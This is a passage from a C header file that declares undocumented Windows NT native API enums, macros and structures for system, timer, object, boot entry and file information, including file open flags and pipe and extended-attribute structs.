858 | SystemObjectInformation = 17, 859 | SystemPageFileInformation = 18, 860 | SystemVdmInstemulInformation = 19, 861 | SystemVdmBopInformation = 20, 862 | SystemFileCacheInformation = 21, 863 | SystemPoolTagInformation = 22, 864 | SystemInterruptInformation = 23, 865 | SystemDpcBehaviorInformation = 24, 866 | SystemFullMemoryInformation = 25, 867 | SystemLoadGdiDriverInformation = 26, 868 | SystemUnloadGdiDriverInformation = 27, 869 | SystemTimeAdjustmentInformation = 28, 870 | SystemSummaryMemoryInformation = 29, 871 | SystemMirrorMemoryInformation = 30, 872 | SystemPerformanceTraceInformation = 31, 873 | SystemObsolete0 = 32, 874 | SystemExceptionInformation = 33, 875 | SystemCrashDumpStateInformation = 34, 876 | SystemKernelDebuggerInformation = 35, 877 | SystemContextSwitchInformation = 36, 878 | SystemRegistryQuotaInformation = 37, 879 | SystemExtendServiceTableInformation = 38, 880 | SystemPrioritySeperation = 39, 881 | SystemVerifierAddDriverInformation = 40, 882 | SystemVerifierRemoveDriverInformation = 41, 883 | SystemProcessorIdleInformation = 42, 884 | SystemLegacyDriverInformation = 43, 885 | SystemCurrentTimeZoneInformation = 44, 886 | SystemLookasideInformation = 45, 887 | SystemTimeSlipNotification = 46, 888 | SystemSessionCreate = 47, 889 | SystemSessionDetach = 48, 890 | SystemSessionInformation = 49, 891 | SystemRangeStartInformation = 50, 892 | SystemVerifierInformation = 51, 893 | SystemVerifierThunkExtend = 52, 894 | SystemSessionProcessInformation = 53, 895 | SystemLoadGdiDriverInSystemSpace = 54, 896 | SystemNumaProcessorMap = 55, 897 | SystemPrefetcherInformation = 56, 898 | SystemExtendedProcessInformation = 57, 899 | SystemRecommendedSharedDataAlignment = 58, 900 | SystemComPlusPackage = 59, 901 | SystemNumaAvailableMemory = 60, 902 | SystemProcessorPowerInformation = 61, 903 | SystemEmulationBasicInformation = 62, 904 | SystemEmulationProcessorInformation = 63, 905 | SystemExtendedHandleInformation = 64, 906 | SystemLostDelayedWriteInformation = 65, 907 | SystemBigPoolInformation = 66, 908 | SystemSessionPoolTagInformation = 67, 909 | SystemSessionMappedViewInformation = 68, 910 | SystemHotpatchInformation = 69, 911 | SystemObjectSecurityMode = 70, 912 | SystemWatchdogTimerHandler = 71, 913 | SystemWatchdogTimerInformation = 72, 914 | SystemLogicalProcessorInformation = 73, 915 | SystemWow64SharedInformationObsolete = 74, 916 | SystemRegisterFirmwareTableInformationHandler = 75, 917 | SystemFirmwareTableInformation = 76, 918 | SystemModuleInformationEx = 77, 919 | SystemVerifierTriageInformation = 78, 920 | SystemSuperfetchInformation = 79, 921 | SystemMemoryListInformation = 80, 922 | SystemFileCacheInformationEx = 81, 923 | SystemThreadPriorityClientIdInformation = 82, 924 | SystemProcessorIdleCycleTimeInformation = 83, 925 | SystemVerifierCancellationInformation = 84, 926 | SystemProcessorPowerInformationEx = 85, 927 | SystemRefTraceInformation = 86, 928 | SystemSpecialPoolInformation = 87, 929 | SystemProcessIdInformation = 88, 930 | SystemErrorPortInformation = 89, 931 | SystemBootEnvironmentInformation = 90, 932 | SystemHypervisorInformation = 91, 933 | SystemVerifierInformationEx = 92, 934 | SystemTimeZoneInformation = 93, 935 | SystemImageFileExecutionOptionsInformation = 94, 936 | SystemCoverageInformation = 95, 937 | SystemPrefetchPatchInformation = 96, 938 | SystemVerifierFaultsInformation = 97, 939 | SystemSystemPartitionInformation = 98, 940 | SystemSystemDiskInformation = 99, 941 | SystemProcessorPerformanceDistribution = 100, 942 | SystemNumaProximityNodeInformation = 101, 943 | SystemDynamicTimeZoneInformation = 102, 944 | SystemCodeIntegrityInformation = 103, 945 | SystemProcessorMicrocodeUpdateInformation = 104, 946 | SystemProcessorBrandString = 105, 947 | SystemVirtualAddressInformation = 106, 948 | SystemLogicalProcessorAndGroupInformation = 107, 949 | SystemProcessorCycleTimeInformation = 108, 950 | SystemStoreInformation = 109, 951 | SystemRegistryAppendString = 110, 952 | SystemAitSamplingValue = 111, 953 | SystemVhdBootInformation = 112, 954 | SystemCpuQuotaInformation = 113, 955 | SystemNativeBasicInformation = 114, 956 | SystemErrorPortTimeouts = 115, 957 | SystemLowPriorityIoInformation = 116, 958 | SystemBootEntropyInformation = 117, 959 | SystemVerifierCountersInformation = 118, 960 | SystemPagedPoolInformationEx = 119, 961 | SystemSystemPtesInformationEx = 120, 962 | SystemNodeDistanceInformation = 121, 963 | SystemAcpiAuditInformation = 122, 964 | SystemBasicPerformanceInformation = 123, 965 | SystemQueryPerformanceCounterInformation = 124, 966 | SystemSessionBigPoolInformation = 125, 967 | SystemBootGraphicsInformation = 126, 968 | SystemScrubPhysicalMemoryInformation = 127, 969 | SystemBadPageInformation = 128, 970 | SystemProcessorProfileControlArea = 129, 971 | SystemCombinePhysicalMemoryInformation = 130, 972 | SystemEntropyInterruptTimingInformation = 131, 973 | SystemConsoleInformation = 132, 974 | SystemPlatformBinaryInformation = 133, 975 | SystemPolicyInformation = 134, 976 | SystemHypervisorProcessorCountInformation = 135, 977 | SystemDeviceDataInformation = 136, 978 | SystemDeviceDataEnumerationInformation = 137, 979 | SystemMemoryTopologyInformation = 138, 980 | SystemMemoryChannelInformation = 139, 981 | SystemBootLogoInformation = 140, 982 | SystemProcessorPerformanceInformationEx = 141, 983 | SystemSpare0 = 142, 984 | SystemSecureBootPolicyInformation = 143, 985 | SystemPageFileInformationEx = 144, 986 | SystemSecureBootInformation = 145, 987 | SystemEntropyInterruptTimingRawInformation = 146, 988 | SystemPortableWorkspaceEfiLauncherInformation = 147, 989 | SystemFullProcessInformation = 148, 990 | SystemKernelDebuggerInformationEx = 149, 991 | SystemBootMetadataInformation = 150, 992 | SystemSoftRebootInformation = 151, 993 | SystemElamCertificateInformation = 152, 994 | SystemOfflineDumpConfigInformation = 153, 995 | SystemProcessorFeaturesInformation = 154, 996 | SystemRegistryReconciliationInformation = 155, 997 | SystemEdidInformation = 156, 998 | MaxSystemInfoClass = 157 999 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 1000 | #endif 1001 | 1002 | /* 1003 | ** Timer START 1004 | */ 1005 | 1006 | // 1007 | // Timer APC routine definition. 1008 | // 1009 | 1010 | typedef VOID(*PTIMER_APC_ROUTINE) ( 1011 | _In_ PVOID TimerContext, 1012 | _In_ ULONG TimerLowValue, 1013 | _In_ LONG TimerHighValue 1014 | ); 1015 | 1016 | typedef enum _TIMER_TYPE { 1017 | NotificationTimer, 1018 | SynchronizationTimer 1019 | } TIMER_TYPE; 1020 | 1021 | #ifndef _TIMER_INFORMATION_CLASS 1022 | typedef enum _TIMER_INFORMATION_CLASS { 1023 | TimerBasicInformation 1024 | } TIMER_INFORMATION_CLASS; 1025 | #endif 1026 | 1027 | #ifndef _TIMER_BASIC_INFORMATION 1028 | typedef struct _TIMER_BASIC_INFORMATION { 1029 | LARGE_INTEGER RemainingTime; 1030 | BOOLEAN TimerState; 1031 | } TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION; 1032 | #endif 1033 | 1034 | /* 1035 | ** Timer END 1036 | */ 1037 | 1038 | typedef VOID(NTAPI *PIO_APC_ROUTINE)( 1039 | _In_ PVOID ApcContext, 1040 | _In_ PIO_STATUS_BLOCK IoStatusBlock, 1041 | _In_ ULONG Reserved 1042 | ); 1043 | 1044 | typedef struct _OBJECT_DIRECTORY_INFORMATION { 1045 | UNICODE_STRING Name; 1046 | UNICODE_STRING TypeName; 1047 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 1048 | 1049 | #ifndef InitializeObjectAttributes 1050 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 1051 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 1052 | (p)->RootDirectory = r; \ 1053 | (p)->Attributes = a; \ 1054 | (p)->ObjectName = n; \ 1055 | (p)->SecurityDescriptor = s; \ 1056 | (p)->SecurityQualityOfService = NULL; \ 1057 | } 1058 | 1059 | // 1060 | // Valid values for the Attributes field 1061 | // 1062 | 1063 | #define OBJ_INHERIT 0x00000002L 1064 | #define OBJ_PERMANENT 0x00000010L 1065 | #define OBJ_EXCLUSIVE 0x00000020L 1066 | #define OBJ_CASE_INSENSITIVE 0x00000040L 1067 | #define OBJ_OPENIF 0x00000080L 1068 | #define OBJ_OPENLINK 0x00000100L 1069 | #define OBJ_KERNEL_HANDLE 0x00000200L 1070 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 1071 | #define OBJ_VALID_ATTRIBUTES 0x000007F2L 1072 | 1073 | #endif 1074 | 1075 | 1076 | /* 1077 | ** Objects START 1078 | */ 1079 | 1080 | #ifndef _OBJECT_INFORMATION_CLASS 1081 | typedef enum _OBJECT_INFORMATION_CLASS { 1082 | ObjectBasicInformation, 1083 | ObjectNameInformation, 1084 | ObjectTypeInformation, 1085 | ObjectTypesInformation, 1086 | ObjectHandleFlagInformation, 1087 | ObjectSessionInformation, 1088 | MaxObjectInfoClass 1089 | } OBJECT_INFORMATION_CLASS; 1090 | #endif 1091 | 1092 | #ifndef _OBJECT_BASIC_INFORMATION 1093 | typedef struct _OBJECT_BASIC_INFORMATION { 1094 | ULONG Attributes; 1095 | ACCESS_MASK GrantedAccess; 1096 | ULONG HandleCount; 1097 | ULONG PointerCount; 1098 | ULONG PagedPoolCharge; 1099 | ULONG NonPagedPoolCharge; 1100 | ULONG Reserved[3]; 1101 | ULONG NameInfoSize; 1102 | ULONG TypeInfoSize; 1103 | ULONG SecurityDescriptorSize; 1104 | LARGE_INTEGER CreationTime; 1105 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; 1106 | #endif 1107 | 1108 | #ifndef _OBJECT_NAME_INFORMATION 1109 | typedef struct _OBJECT_NAME_INFORMATION { 1110 | UNICODE_STRING Name; 1111 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; 1112 | #endif 1113 | 1114 | #ifndef _OBJECT_TYPE_INFORMATION 1115 | typedef struct _OBJECT_TYPE_INFORMATION { 1116 | UNICODE_STRING TypeName; 1117 | ULONG TotalNumberOfObjects; 1118 | ULONG TotalNumberOfHandles; 1119 | ULONG TotalPagedPoolUsage; 1120 | ULONG TotalNonPagedPoolUsage; 1121 | ULONG TotalNamePoolUsage; 1122 | ULONG TotalHandleTableUsage; 1123 | ULONG HighWaterNumberOfObjects; 1124 | ULONG HighWaterNumberOfHandles; 1125 | ULONG HighWaterPagedPoolUsage; 1126 | ULONG HighWaterNonPagedPoolUsage; 1127 | ULONG HighWaterNamePoolUsage; 1128 | ULONG HighWaterHandleTableUsage; 1129 | ULONG InvalidAttributes; 1130 | GENERIC_MAPPING GenericMapping; 1131 | ULONG ValidAccessMask; 1132 | BOOLEAN SecurityRequired; 1133 | BOOLEAN MaintainHandleCount; 1134 | ULONG PoolType; 1135 | ULONG DefaultPagedPoolCharge; 1136 | ULONG DefaultNonPagedPoolCharge; 1137 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; 1138 | #endif 1139 | 1140 | typedef struct _OBJECT_TYPE_INFORMATION_8 { 1141 | UNICODE_STRING TypeName; 1142 | ULONG TotalNumberOfObjects; 1143 | ULONG TotalNumberOfHandles; 1144 | ULONG TotalPagedPoolUsage; 1145 | ULONG TotalNonPagedPoolUsage; 1146 | ULONG TotalNamePoolUsage; 1147 | ULONG TotalHandleTableUsage; 1148 | ULONG HighWaterNumberOfObjects; 1149 | ULONG HighWaterNumberOfHandles; 1150 | ULONG HighWaterPagedPoolUsage; 1151 | ULONG HighWaterNonPagedPoolUsage; 1152 | ULONG HighWaterNamePoolUsage; 1153 | ULONG HighWaterHandleTableUsage; 1154 | ULONG InvalidAttributes; 1155 | GENERIC_MAPPING GenericMapping; 1156 | ULONG ValidAccessMask; 1157 | BOOLEAN SecurityRequired; 1158 | BOOLEAN MaintainHandleCount; 1159 | UCHAR TypeIndex; 1160 | CHAR ReservedByte; 1161 | ULONG PoolType; 1162 | ULONG DefaultPagedPoolCharge; 1163 | ULONG DefaultNonPagedPoolCharge; 1164 | } OBJECT_TYPE_INFORMATION_8, *POBJECT_TYPE_INFORMATION_8; 1165 | 1166 | #ifndef _OBJECT_TYPES_INFORMATION 1167 | typedef struct _OBJECT_TYPES_INFORMATION 1168 | { 1169 | ULONG NumberOfTypes; 1170 | OBJECT_TYPE_INFORMATION TypeInformation; 1171 | } OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION; 1172 | #endif 1173 | 1174 | #ifndef _OBJECT_HANDLE_FLAG_INFORMATION 1175 | typedef struct _OBJECT_HANDLE_FLAG_INFORMATION 1176 | { 1177 | BOOLEAN Inherit; 1178 | BOOLEAN ProtectFromClose; 1179 | } OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; 1180 | #endif 1181 | /* 1182 | ** Objects END 1183 | */ 1184 | 1185 | /* 1186 | ** Boot Entry START 1187 | */ 1188 | 1189 | typedef struct _FILE_PATH { 1190 | ULONG Version; 1191 | ULONG Length; 1192 | ULONG Type; 1193 | UCHAR FilePath[ANYSIZE_ARRAY]; 1194 | } FILE_PATH, *PFILE_PATH; 1195 | 1196 | typedef struct _BOOT_ENTRY { 1197 | ULONG Version; 1198 | ULONG Length; 1199 | ULONG Id; 1200 | ULONG Attributes; 1201 | ULONG FriendlyNameOffset; 1202 | ULONG BootFilePathOffset; 1203 | ULONG OsOptionsLength; 1204 | UCHAR OsOptions[ANYSIZE_ARRAY]; 1205 | } BOOT_ENTRY, *PBOOT_ENTRY; 1206 | 1207 | typedef struct _BOOT_ENTRY_LIST { 1208 | ULONG NextEntryOffset; 1209 | BOOT_ENTRY BootEntry; 1210 | } BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST; 1211 | 1212 | /* 1213 | ** Boot Entry END 1214 | */ 1215 | 1216 | /* 1217 | ** File start 1218 | */ 1219 | 1220 | #define FILE_SUPERSEDE 0x00000000 1221 | #define FILE_OPEN 0x00000001 1222 | #define FILE_CREATE 0x00000002 1223 | #define FILE_OPEN_IF 0x00000003 1224 | #define FILE_OVERWRITE 0x00000004 1225 | #define FILE_OVERWRITE_IF 0x00000005 1226 | #define FILE_MAXIMUM_DISPOSITION 0x00000005 1227 | 1228 | #define FILE_DIRECTORY_FILE 0x00000001 1229 | #define FILE_WRITE_THROUGH 0x00000002 1230 | #define FILE_SEQUENTIAL_ONLY 0x00000004 1231 | #define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 1232 | 1233 | #define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 1234 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 1235 | #define FILE_NON_DIRECTORY_FILE 0x00000040 1236 | #define FILE_CREATE_TREE_CONNECTION 0x00000080 1237 | 1238 | #define FILE_COMPLETE_IF_OPLOCKED 0x00000100 1239 | #define FILE_NO_EA_KNOWLEDGE 0x00000200 1240 | #define FILE_OPEN_FOR_RECOVERY 0x00000400 1241 | #define FILE_RANDOM_ACCESS 0x00000800 1242 | 1243 | #define FILE_DELETE_ON_CLOSE 0x00001000 1244 | #define FILE_OPEN_BY_FILE_ID 0x00002000 1245 | #define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 1246 | #define FILE_NO_COMPRESSION 0x00008000 1247 | 1248 | #define FILE_RESERVE_OPFILTER 0x00100000 1249 | #define FILE_OPEN_REPARSE_POINT 0x00200000 1250 | #define FILE_OPEN_NO_RECALL 0x00400000 1251 | #define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 1252 | 1253 | 1254 | #define FILE_COPY_STRUCTURED_STORAGE 0x00000041 1255 | #define FILE_STRUCTURED_STORAGE 0x00000441 1256 | 1257 | #define FILE_VALID_OPTION_FLAGS 0x00ffffff 1258 | #define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032 1259 | #define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032 1260 | #define FILE_VALID_SET_FLAGS 0x00000036 1261 | 1262 | #ifndef _FILE_INFORMATION_CLASS 1263 | typedef enum _FILE_INFORMATION_CLASS 1264 | { 1265 | FileDirectoryInformation = 1, 1266 | FileFullDirectoryInformation, 1267 | FileBothDirectoryInformation, 1268 | FileBasicInformation, 1269 | FileStandardInformation, 1270 | FileInternalInformation, 1271 | FileEaInformation, 1272 | FileAccessInformation, 1273 | FileNameInformation, 1274 | FileRenameInformation, 1275 | FileLinkInformation, 1276 | FileNamesInformation, 1277 | FileDispositionInformation, 1278 | FilePositionInformation, 1279 | FileFullEaInformation, 1280 | FileModeInformation, 1281 | FileAlignmentInformation, 1282 | FileAllInformation, 1283 | FileAllocationInformation, 1284 | FileEndOfFileInformation, 1285 | FileAlternateNameInformation, 1286 | FileStreamInformation, 1287 | FilePipeInformation, 1288 | FilePipeLocalInformation, 1289 | FilePipeRemoteInformation, 1290 | FileMailslotQueryInformation, 1291 | FileMailslotSetInformation, 1292 | FileCompressionInformation, 1293 | FileObjectIdInformation, 1294 | FileCompletionInformation, 1295 | FileMoveClusterInformation, 1296 | FileQuotaInformation, 1297 | FileReparsePointInformation, 1298 | FileNetworkOpenInformation, 1299 | FileAttributeTagInformation, 1300 | FileTrackingInformation, 1301 | FileIdBothDirectoryInformation, 1302 | FileIdFullDirectoryInformation, 1303 | FileValidDataLengthInformation, 1304 | FileShortNameInformation, 1305 | FileIoCompletionNotificationInformation, 1306 | FileIoStatusBlockRangeInformation, 1307 | FileIoPriorityHintInformation, 1308 | FileSfioReserveInformation, 1309 | FileSfioVolumeInformation, 1310 | FileHardLinkInformation, 1311 | FileProcessIdsUsingFileInformation, 1312 | FileNormalizedNameInformation, 1313 | FileNetworkPhysicalNameInformation, 1314 | FileIdGlobalTxDirectoryInformation, 1315 | FileMaximumInformation 1316 | } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; 1317 | #endif 1318 | 1319 | #ifndef _FILE_INFORMATION_CLASS 1320 | typedef enum _FSINFOCLASS { 1321 | FileFsVolumeInformation = 1, 1322 | FileFsLabelInformation, 1323 | FileFsSizeInformation, 1324 | FileFsDeviceInformation, 1325 | FileFsAttributeInformation, 1326 | FileFsControlInformation, 1327 | FileFsFullSizeInformation, 1328 | FileFsObjectIdInformation, 1329 | FileFsDriverPathInformation, 1330 | FileFsVolumeFlagsInformation, 1331 | FileFsMaximumInformation 1332 | } FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; 1333 | #endif 1334 | 1335 | typedef struct _FILE_BASIC_INFORMATION { 1336 | LARGE_INTEGER CreationTime; 1337 | LARGE_INTEGER LastAccessTime; 1338 | LARGE_INTEGER LastWriteTime; 1339 | LARGE_INTEGER ChangeTime; 1340 | ULONG FileAttributes; 1341 | } FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; 1342 | 1343 | typedef struct _FILE_STANDARD_INFORMATION 1344 | { 1345 | LARGE_INTEGER AllocationSize; 1346 | LARGE_INTEGER EndOfFile; 1347 | ULONG NumberOfLinks; 1348 | UCHAR DeletePending; 1349 | UCHAR Directory; 1350 | } FILE_STANDARD_INFORMATION; 1351 | 1352 | typedef struct _FILE_INTERNAL_INFORMATION { 1353 | LARGE_INTEGER IndexNumber; 1354 | } FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; 1355 | 1356 | typedef struct _FILE_EA_INFORMATION { 1357 | ULONG EaSize; 1358 | } FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; 1359 | 1360 | typedef struct _FILE_ACCESS_INFORMATION { 1361 | ACCESS_MASK AccessFlags; 1362 | } FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; 1363 | 1364 | typedef struct _FILE_POSITION_INFORMATION { 1365 | LARGE_INTEGER CurrentByteOffset; 1366 | } FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; 1367 | 1368 | typedef struct _FILE_MODE_INFORMATION { 1369 | ULONG Mode; 1370 | } FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; 1371 | 1372 | typedef struct _FILE_ALIGNMENT_INFORMATION { 1373 | ULONG AlignmentRequirement; 1374 | } FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; 1375 | 1376 | typedef struct _FILE_NAME_INFORMATION { 1377 | ULONG FileNameLength; 1378 | WCHAR FileName[1]; 1379 | } FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; 1380 | 1381 | typedef struct _FILE_ALL_INFORMATION { 1382 | FILE_BASIC_INFORMATION BasicInformation; 1383 | FILE_STANDARD_INFORMATION StandardInformation; 1384 | FILE_INTERNAL_INFORMATION InternalInformation; 1385 | FILE_EA_INFORMATION EaInformation; 1386 | FILE_ACCESS_INFORMATION AccessInformation; 1387 | FILE_POSITION_INFORMATION PositionInformation; 1388 | FILE_MODE_INFORMATION ModeInformation; 1389 | FILE_ALIGNMENT_INFORMATION AlignmentInformation; 1390 | FILE_NAME_INFORMATION NameInformation; 1391 | } FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; 1392 | 1393 | typedef struct _FILE_NETWORK_OPEN_INFORMATION { 1394 | LARGE_INTEGER CreationTime; 1395 | LARGE_INTEGER LastAccessTime; 1396 | LARGE_INTEGER LastWriteTime; 1397 | LARGE_INTEGER ChangeTime; 1398 | LARGE_INTEGER AllocationSize; 1399 | LARGE_INTEGER EndOfFile; 1400 | ULONG FileAttributes; 1401 | } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; 1402 | 1403 | typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { 1404 | ULONG FileAttributes; 1405 | ULONG ReparseTag; 1406 | } FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; 1407 | 1408 | typedef struct _FILE_ALLOCATION_INFORMATION { 1409 | LARGE_INTEGER AllocationSize; 1410 | } FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; 1411 | 1412 | typedef struct _FILE_COMPRESSION_INFORMATION { 1413 | LARGE_INTEGER CompressedFileSize; 1414 | USHORT CompressionFormat; 1415 | UCHAR CompressionUnitShift; 1416 | UCHAR ChunkShift; 1417 | UCHAR ClusterShift; 1418 | UCHAR Reserved[3]; 1419 | } FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; 1420 | 1421 | typedef struct _FILE_DISPOSITION_INFORMATION { 1422 | BOOLEAN DeleteFile; 1423 | } FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; 1424 | 1425 | typedef struct _FILE_END_OF_FILE_INFORMATION { 1426 | LARGE_INTEGER EndOfFile; 1427 | } FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; 1428 | 1429 | typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { 1430 | LARGE_INTEGER ValidDataLength; 1431 | } FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; 1432 | 1433 | typedef struct _FILE_LINK_INFORMATION { 1434 | BOOLEAN ReplaceIfExists; 1435 | HANDLE RootDirectory; 1436 | ULONG FileNameLength; 1437 | WCHAR FileName[1]; 1438 | } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; 1439 | 1440 | typedef struct _FILE_MOVE_CLUSTER_INFORMATION { 1441 | ULONG ClusterCount; 1442 | HANDLE RootDirectory; 1443 | ULONG FileNameLength; 1444 | WCHAR FileName[1]; 1445 | } FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; 1446 | 1447 | typedef struct _FILE_RENAME_INFORMATION { 1448 | BOOLEAN ReplaceIfExists; 1449 | HANDLE RootDirectory; 1450 | ULONG FileNameLength; 1451 | WCHAR FileName[1]; 1452 | } FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; 1453 | 1454 | typedef struct _FILE_STREAM_INFORMATION { 1455 | ULONG NextEntryOffset; 1456 | ULONG StreamNameLength; 1457 | LARGE_INTEGER StreamSize; 1458 | LARGE_INTEGER StreamAllocationSize; 1459 | WCHAR StreamName[1]; 1460 | } FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; 1461 | 1462 | typedef struct _FILE_TRACKING_INFORMATION { 1463 | HANDLE DestinationFile; 1464 | ULONG ObjectInformationLength; 1465 | CHAR ObjectInformation[1]; 1466 | } FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; 1467 | 1468 | typedef struct _FILE_COMPLETION_INFORMATION { 1469 | HANDLE Port; 1470 | PVOID Key; 1471 | } FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; 1472 | 1473 | // 1474 | // Define the NamedPipeType flags for NtCreateNamedPipeFile 1475 | // 1476 | 1477 | #define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000 1478 | #define FILE_PIPE_MESSAGE_TYPE 0x00000001 1479 | 1480 | // 1481 | // Define the CompletionMode flags for NtCreateNamedPipeFile 1482 | // 1483 | 1484 | #define FILE_PIPE_QUEUE_OPERATION 0x00000000 1485 | #define FILE_PIPE_COMPLETE_OPERATION 0x00000001 1486 | 1487 | // 1488 | // Define the ReadMode flags for NtCreateNamedPipeFile 1489 | // 1490 | 1491 | #define FILE_PIPE_BYTE_STREAM_MODE 0x00000000 1492 | #define FILE_PIPE_MESSAGE_MODE 0x00000001 1493 | 1494 | // 1495 | // Define the NamedPipeConfiguration flags for NtQueryInformation 1496 | // 1497 | 1498 | #define FILE_PIPE_INBOUND 0x00000000 1499 | #define FILE_PIPE_OUTBOUND 0x00000001 1500 | #define FILE_PIPE_FULL_DUPLEX 0x00000002 1501 | 1502 | // 1503 | // Define the NamedPipeState flags for NtQueryInformation 1504 | // 1505 | 1506 | #define FILE_PIPE_DISCONNECTED_STATE 0x00000001 1507 | #define FILE_PIPE_LISTENING_STATE 0x00000002 1508 | #define FILE_PIPE_CONNECTED_STATE 0x00000003 1509 | #define FILE_PIPE_CLOSING_STATE 0x00000004 1510 | 1511 | // 1512 | // Define the NamedPipeEnd flags for NtQueryInformation 1513 | // 1514 | 1515 | #define FILE_PIPE_CLIENT_END 0x00000000 1516 | #define FILE_PIPE_SERVER_END 0x00000001 1517 | 1518 | 1519 | typedef struct _FILE_PIPE_INFORMATION { 1520 | ULONG ReadMode; 1521 | ULONG CompletionMode; 1522 | } FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; 1523 | 1524 | typedef struct _FILE_PIPE_LOCAL_INFORMATION { 1525 | ULONG NamedPipeType; 1526 | ULONG NamedPipeConfiguration; 1527 | ULONG MaximumInstances; 1528 | ULONG CurrentInstances; 1529 | ULONG InboundQuota; 1530 | ULONG ReadDataAvailable; 1531 | ULONG OutboundQuota; 1532 | ULONG WriteQuotaAvailable; 1533 | ULONG NamedPipeState; 1534 | ULONG NamedPipeEnd; 1535 | } FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; 1536 | 1537 | typedef struct _FILE_PIPE_REMOTE_INFORMATION { 1538 | LARGE_INTEGER CollectDataTime; 1539 | ULONG MaximumCollectionCount; 1540 | } FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; 1541 | 1542 | typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { 1543 | ULONG MaximumMessageSize; 1544 | ULONG MailslotQuota; 1545 | ULONG NextMessageSize; 1546 | ULONG MessagesAvailable; 1547 | LARGE_INTEGER ReadTimeout; 1548 | } FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; 1549 | 1550 | typedef struct _FILE_MAILSLOT_SET_INFORMATION { 1551 | PLARGE_INTEGER ReadTimeout; 1552 | } FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; 1553 | 1554 | typedef struct _FILE_REPARSE_POINT_INFORMATION { 1555 | LONGLONG FileReference; 1556 | ULONG Tag; 1557 | } FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; 1558 | 1559 | // 1560 | // Define the flags for NtSet(Query)EaFile service structure entries 1561 | // 1562 | 1563 | #define FILE_NEED_EA 0x00000080 1564 | 1565 | // 1566 | // Define EA type values 1567 | // 1568 | 1569 | #define FILE_EA_TYPE_BINARY 0xfffe 1570 | #define FILE_EA_TYPE_ASCII 0xfffd 1571 | #define FILE_EA_TYPE_BITMAP 0xfffb 1572 | #define FILE_EA_TYPE_METAFILE 0xfffa 1573 | #define FILE_EA_TYPE_ICON 0xfff9 1574 | #define FILE_EA_TYPE_EA 0xffee 1575 | #define FILE_EA_TYPE_MVMT 0xffdf 1576 | #define FILE_EA_TYPE_MVST 0xffde 1577 | #define FILE_EA_TYPE_ASN1 0xffdd 1578 | #define FILE_EA_TYPE_FAMILY_IDS 0xff01 1579 | 1580 | typedef struct _FILE_FULL_EA_INFORMATION { 1581 | ULONG NextEntryOffset; 1582 | UCHAR Flags; 1583 | UCHAR EaNameLength; 1584 | USHORT EaValueLength; 1585 | CHAR EaName[1]; 1586 | } FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; 1587 | 1588 | typedef struct _FILE_GET_EA_INFORMATION { 1589 | ULONG NextEntryOffset; 1590 | UCHAR EaNameLength; 1591 | CHAR EaName[1]; 1592 | } FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION; 1593 | 1594 | typedef struct _FILE_GET_QUOTA_INFORMATION { 1595 | ULONG NextEntryOffset; 1596 | ULONG SidLength; 1597 | SID Sid; 1598 | } FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION; 1599 